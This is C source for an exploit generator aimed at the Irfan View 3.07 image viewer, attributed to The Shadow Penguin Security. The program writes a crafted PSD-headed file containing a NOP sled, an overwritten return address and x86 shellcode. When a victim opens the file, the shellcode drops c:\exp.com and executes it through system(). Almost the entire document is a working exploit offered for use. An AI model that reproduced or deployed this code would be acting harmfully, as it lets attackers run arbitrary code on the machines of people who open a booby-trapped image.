/*============================================================================= Irfan View 3.07 Exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include #include #include #define MAXBUF 0x22e0 #define RETADR 0x31E #define FAKE_ADR 0x80101010 // Writable buffer pointer #define JMPESP_ADR 0xbffca4f7 // You have to change this value // for non-Japanese Windows98. #define HEAD "8BPS\0" unsigned char exploit_code[300]={ 0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47, 0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50, 0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50, 0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7, 0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB, 0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90, 0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3, 0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F, 0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0, 0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF, 0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00 }; // "exp.com" unsigned char exploit_data[1000]={ 0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c, 0x20,0x77,0xf1,0xeb,0xf1,0x00 }; int GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc}; char string_buffer[1000] ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****"; char filename[100] = "c:\\exp.com"; main(int argc,char *argv[]) { unsigned char buf[MAXBUF],l1,l2; unsigned int ip,p1,p2,i; FILE *fp; if (argc<2) { printf("usage : %s outputfile\n",argv[0]); exit(1); } memset(buf,0x90,MAXBUF); buf[MAXBUF]=0; memcpy(buf,HEAD,4); ip=JMPESP_ADR; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[RETADR+6]=0xeb; buf[RETADR+7]=0x04; ip=FAKE_ADR; buf[RETADR+8]=ip&0xff; buf[RETADR+9]=(ip>>8)&0xff; buf[RETADR+10]=(ip>>16)&0xff; buf[RETADR+11]=(ip>>24)&0xff; p1=(unsigned int)LoadLibrary; p2=(unsigned int)GetProcAddress; exploit_code[0x1f]=p1&0xff; exploit_code[0x20]=(p1>>8)&0xff; exploit_code[0x21]=(p1>>16)&0xff; exploit_code[0x22]=(p1>>24)&0xff; for (i=0;i<4;i++) { exploit_code[GetProcAddress_fcp[i] ]=p2&0xff; exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff; exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff; exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff; } l1=strlen(filename)+strlen(string_buffer); l2=strlen(exploit_data); strcat(string_buffer,filename ); strcat(string_buffer,"_" ); strcat(string_buffer,exploit_data ); strcat(exploit_code, string_buffer ); exploit_code[0x1c] = l1; exploit_code[0x6d] = l2; exploit_code[0x77] = l1+1; memcpy(buf+RETADR+12,exploit_code,strlen(exploit_code)); if ((fp=fopen(argv[1],"wb"))==NULL) { printf("Can not write file '%s'\n",argv[1]); exit(1); } fwrite(buf,1,MAXBUF,fp); fclose(fp); printf("Done.\n"); return FALSE; } /* www.hack.co.za [2000]*/